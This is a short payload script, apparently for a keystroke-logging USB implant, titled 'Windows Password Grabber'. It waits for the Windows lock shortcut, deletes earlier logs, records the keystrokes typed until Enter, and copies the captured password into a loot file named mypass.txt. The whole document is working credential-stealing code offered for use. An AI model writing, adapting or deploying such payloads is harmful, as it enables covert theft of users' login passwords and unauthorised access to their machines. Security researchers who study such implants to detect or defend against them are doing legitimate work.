# Title: Windows Password Grabber # Description: When GUI L is pressed it will long out the current user and request a password that will be captured and stored in loot. # Author: RootJunky # Version: 1.0 # Category: Credentials # # MATCH \[GUI-l] Q STRING $(rm /root/udisk/loot/password-GUI-L.log) Q DELAY 500 Q STRING $(rm /root/udisk/loot/password-GUI-L.log.filtered) Q DELAY 500 SAVEKEYS /root/udisk/loot/password-GUI-L.log UNTIL \[ENTER\] WAIT_FOR_LOOT Q DELAY 8000 Q STRING $(cp "/root/udisk/loot/password-GUI-L.log.filtered" /root/udisk/loot/mypass.txt) Q DELAY 1000 LED FINISH Q DELAY 2000 LED OFF